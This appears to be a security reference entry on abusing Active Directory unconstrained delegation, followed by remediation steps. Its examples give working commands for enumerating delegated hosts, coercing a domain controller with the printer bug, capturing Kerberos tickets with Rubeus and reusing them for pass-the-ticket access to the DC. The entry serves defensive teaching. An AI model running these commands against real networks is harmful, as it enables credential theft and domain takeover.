Unconstrained Delegation

Description

Unconstrained delegation allows a service to impersonate any user after they authenticate to it. If an attacker compromises a machine or account configured with unconstrained delegation, they can harvest incoming Kerberos tickets (TGTs or service tickets) from privileged users and reuse them to access other services, including domain controllers. Classic coercion techniques (printer bug/MS‑RPRN, WebDAV, SpoolSample, PetitPotam) can force privileged connections to a compromised delegated host.

Examples

Discover Unconstrained Delegation Principals

From a domain-joined host:

# PowerView
Get-DomainComputer -Unconstrained | Select Name, UserAccountControl

# Native AD module
Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" -Properties TrustedForDelegation

Coerce a Privileged Connection and Capture Tickets

Coerce a domain controller to connect to the delegated host (printer bug), then monitor for tickets:

# On the attacker-controlled delegated host
Rubeus monitor /interval:5 /nowrap

# From elsewhere, trigger MS-RPRN printer bug towards the delegated host
printerbug.py corp.local/user:[email protected] delegatedhost.corp.local

When a privileged account connects, extract and reuse the ticket.

Abuse captured tickets for lateral movement

With a captured Administrator ticket injected, access privileged resources:

Rubeus asktgs /service:cifs/dc01.corp.local /ptt
dir \\dc01.corp.local\c$\Windows\System32

Remediation

  1. Eliminate unconstrained delegation
    • Replace with constrained delegation or remove delegation entirely.
    • Never allow unconstrained delegation on Tier 0 assets (DCs, ADFS, PKI).
  2. Segment and restrict
    • Isolate any remaining delegated hosts from critical infrastructure via firewall rules.
    • Disable inbound protocols commonly abused for coercion (e.g., MS‑RPRN) or patch and restrict access.
  3. Rotate secrets and monitor
    • Rotate service account credentials and purge tickets after configuration changes.
    • Alert on additions to the TrustedForDelegation flag and unusual ticket flows.